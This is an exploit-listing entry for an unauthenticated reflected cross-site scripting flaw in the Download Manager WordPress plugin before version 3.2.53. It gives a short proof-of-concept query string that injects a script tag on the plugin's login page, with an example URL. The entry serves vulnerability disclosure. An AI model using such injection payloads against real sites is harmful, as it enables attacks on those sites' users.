Exploit for Download Manager < 3.2.53 - Unauthenticated Reflected Cross-Site Scripting

Name: Exploit for Download Manager < 3.2.53 - Unauthenticated Reflected Cross-Site Scripting
Rating: 5 (178 reviews)

2022-08-04 | CVSS 0.4

## https://sploitus.com/exploit?id=WPEX-ID:394007C5-7923-46FE-BB4C-2377D66FF900
On the modal login page from the plugin and using an old web browser (such as IE), append ?a"><script>alert(/XSS/)</script>

e.g: https://example.com/login/?a"><script>alert(/XSS/)</script>